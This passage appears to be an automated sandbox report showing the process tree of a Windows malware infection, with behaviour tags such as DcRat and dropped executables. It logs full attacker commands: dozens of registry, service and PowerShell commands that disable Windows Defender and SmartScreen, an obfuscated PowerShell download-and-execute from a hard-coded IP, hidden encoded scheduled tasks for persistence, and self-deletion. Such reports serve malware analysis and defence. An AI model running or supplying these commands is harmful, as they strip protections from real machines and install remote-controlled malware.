11⤵
PID:5016

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
11⤵
PID:5820

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
11⤵
PID:5668

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
11⤵
PID:6104

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
11⤵
PID:5932

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
11⤵
PID:4316

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
11⤵
PID:5796

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
11⤵
PID:4544

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
11⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:6020

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
11⤵
PID:5028

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
11⤵
PID:1164

C:\Windows\SysWOW64\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t "REG_DWORD" /d "0" /f
11⤵
PID:940

C:\Windows\SysWOW64\takeown.exe
takeown /f "C:\Windows\System32\smartscreen.exe" /a
11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4236

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
11⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5940

C:\Windows\SysWOW64\taskkill.exe
taskkill /im smartscreen.exe /f
11⤵
- Kills process with taskkill
PID:3880

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
11⤵
PID:4080

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
11⤵
PID:5280

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
11⤵
PID:3968

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
11⤵
PID:3328

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
11⤵
PID:4604

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
11⤵
PID:2352

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
11⤵
PID:4748

C:\Windows\SysWOW64\sc.exe
sc stop WinDefend
11⤵
PID:4792

C:\Windows\SysWOW64\sc.exe
sc stop WdNisDrv
11⤵
PID:4044

C:\Windows\SysWOW64\sc.exe
sc stop WdNisSvc
11⤵
PID:4536

C:\Windows\SysWOW64\sc.exe
sc stop WdFilter
11⤵
PID:4780

C:\Windows\SysWOW64\sc.exe
sc stop WdBoot
11⤵
PID:1404

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:5212

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:4488

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:5452

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:2964

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
11⤵
PID:2312

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
11⤵
PID:1636

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
11⤵
PID:5424

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
11⤵
PID:5836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
11⤵
PID:2752

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
11⤵
PID:2120

C:\Windows\SysWOW64\timeout.exe
timeout /t 2
11⤵
- Delays execution with timeout.exe
PID:1332

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
Power.exe Regedit.exe /S Offer.reg
11⤵
PID:5264

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg
12⤵
PID:2496

C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe
"C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg
13⤵
PID:5316

C:\Windows\Regedit.exe
"C:\Windows\Regedit.exe" /S Offer.reg
14⤵
- Runs .reg file with regedit
PID:4108

C:\Windows\SysWOW64\reg.exe
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f
11⤵
PID:4308

C:\Windows\SysWOW64\sc.exe
sc delete SgrmBroker
11⤵
PID:5240

C:\Windows\SysWOW64\sc.exe
sc delete SgrmAgent
11⤵
PID:5340

C:\Windows\SysWOW64\sc.exe
sc delete SecurityHealthService
11⤵
PID:4844

C:\Windows\SysWOW64\sc.exe
sc delete WdBoot
11⤵
PID:4164

C:\Windows\SysWOW64\sc.exe
sc delete WdFiltrer
11⤵
PID:4972

C:\Windows\SysWOW64\sc.exe
sc delete WdNisSvc
11⤵
PID:3544

C:\Windows\SysWOW64\sc.exe
sc delete WdNisDrv
11⤵
PID:3900

C:\Windows\SysWOW64\sc.exe
sc delete wscsvc
11⤵
PID:3396

C:\Windows\SysWOW64\sc.exe
sc delete Sense
11⤵
PID:4716

C:\Windows\SysWOW64\sc.exe
sc delete WinDefend
11⤵
PID:4152

C:\Windows\SysWOW64\timeout.exe
timeout /t 2
11⤵
- Delays execution with timeout.exe
PID:5056

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"
11⤵
PID:5900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"
11⤵
PID:5956

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"
11⤵
PID:3968

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
11⤵
PID:1336

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -PUAProtection disable"
11⤵
PID:5236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
11⤵
PID:2192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
11⤵
PID:3716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
11⤵
PID:2744

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
11⤵
PID:5724

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
11⤵
PID:6016

C:\Users\Admin\AppData\Roaming\OneDrive\Drive.exe
Drive.exe
11⤵
PID:4736

C:\Windows\SYSTEM32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
12⤵
PID:5132

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
13⤵
- DcRat
- Creates scheduled task(s)
PID:5392

C:\Windows\SYSTEM32\cmd.exe
"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
12⤵
PID:6096

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
13⤵
PID:4008

C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe"
14⤵
PID:3376

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe wjzmhxaceqz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7071LQ7krggxA/UnVAaiocMjg0W1H5yAsWgrQR/11zt7RRg3ZnxBodCtMBKiY6+h9La4/jA7nc9BcXwzk8+WkGkxNBMC7OGlDKj9rOiTQ/TOxoHyWdibvyBbcnCZiKPxB8iibCz9eqCXI7CHageLKU6YJPTRFLen1ePs/tUv7hCEAIVa5jfPO/y1Z4uyViDjd5hg2gMd7UuClJ+CBHAOYUVsH8w1ma5UC3dsohG2flQxaKhHOaDpp5ELr7DD/0MGPcTCx4O3hoEDL/m+UtWA6Qj3vGo+MsusQ4bNf46gR3oRP951wrLt7MHk+nkdjBgVoC5qv8B33n5lfVldrIlXKY5U377OV/MbG7Ue/212cYr
14⤵
PID:5788

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5788 -s 408
15⤵
- Program crash
PID:5976

C:\Windows\SysWOW64\timeout.exe
timeout /t 4
11⤵
- Delays execution with timeout.exe
PID:5160

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
7⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:3848

C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe
"C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe"
6⤵
- Executes dropped EXE
PID:4900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 432
7⤵
- Program crash
PID:4944

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 440
7⤵
- Program crash
PID:6120

C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe
"C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe"
6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1600

C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe
"C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe"
6⤵
- Executes dropped EXE
PID:5004

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 432
7⤵
- Program crash
PID:5100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 452
7⤵
- Program crash
PID:5396

C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe
"C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
7⤵
PID:4272

C:\Windows\system32\mode.com
mode 65,10
8⤵
PID:5232

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e file.zip -p320791618516055 -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5880

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_9.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5508

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_8.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5928

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_7.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3404

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_6.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1580

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_5.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1060

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_4.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3796

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_3.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2560

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_2.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:620

C:\Users\Admin\AppData\Local\Temp\123\7z.exe
7z.exe e extracted/file_1.zip -oextracted
8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:316

C:\Windows\system32\attrib.exe
attrib +H "Result_protected.exe"
8⤵
- Views/modifies file attributes
PID:776

C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe
"Result_protected.exe"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
PID:4168

C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
9⤵
PID:1448

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"
10⤵
- DcRat
- Creates scheduled task(s)
PID:5384

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
11⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1612

C:\Users\Admin\AppData\Local\Temp\222.exe
"C:\Users\Admin\AppData\Local\Temp\222.exe"
9⤵
- Executes dropped EXE
PID:5328

C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe
"C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"
6⤵
- Executes dropped EXE
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 432
7⤵
- Program crash
PID:4840

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 452
7⤵
- Program crash
PID:5860

C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe
"C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:1328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:768

C:\Windows\SysWOW64\taskkill.exe
taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f
8⤵
- Kills process with taskkill
PID:6008

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:4544

C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe
"C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"
6⤵
PID:3376

C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe
"C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 1628
7⤵
- Program crash
PID:3700

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 2056
7⤵
- Program crash
PID:1612

C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe
"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"
6⤵
PID:1612

C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe
"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"
7⤵
- Executes dropped EXE
PID:5824

C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe
"C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"
6⤵
- Executes dropped EXE
PID:4820

C:\Users\Admin\AppData\Local\Temp\7zSB515.tmp\Install.exe
.\Install.exe
7⤵
- Executes dropped EXE
PID:5136

C:\Users\Admin\AppData\Local\Temp\7zSCB8B.tmp\Install.exe
.\Install.exe /S /site_id "525403"
8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:5696

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
9⤵
PID:5124

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3376

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
11⤵
PID:2540

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
11⤵
PID:4968

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
9⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
10⤵
PID:5624

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
11⤵
PID:2172

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
11⤵
PID:3716

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gneIVspRo" /SC once /ST 00:50:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
9⤵
- DcRat
- Creates scheduled task(s)
PID:6076

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gneIVspRo"
9⤵
PID:5808

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gneIVspRo"
9⤵
PID:3636

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe\" j6 /site_id 525403 /S" /V1 /F
9⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4956

C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe
"C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"
6⤵
- Executes dropped EXE
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe
7⤵
PID:4660

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 0
8⤵
PID:2132

C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe
"C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3444

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_7.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3852

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
arnatic_7.exe
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2940

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe
6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_5.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:3868

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exe
arnatic_5.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3700

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_4.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2672

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exe
arnatic_4.exe
5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1900

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
PID:776

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_3.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2776

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exe
arnatic_3.exe
5⤵
- Executes dropped EXE
PID:2072

C:\Windows\SysWOW64\rUNdlL32.eXe
"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft
6⤵
- Loads dropped DLL
PID:1060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 600
7⤵
- Program crash
PID:2084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:648

C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exe
arnatic_1.exe
5⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 1032
6⤵
- Program crash
PID:3000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1060 -ip 1060
1⤵
PID:3112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3528 -ip 3528
1⤵
PID:3988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4468

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\dllhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\runonce\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comuid\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\dpnathlp\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "5RLR8rS_aMkp6xiTBY96V6aV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\These\5RLR8rS_aMkp6xiTBY96V6aV.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4592

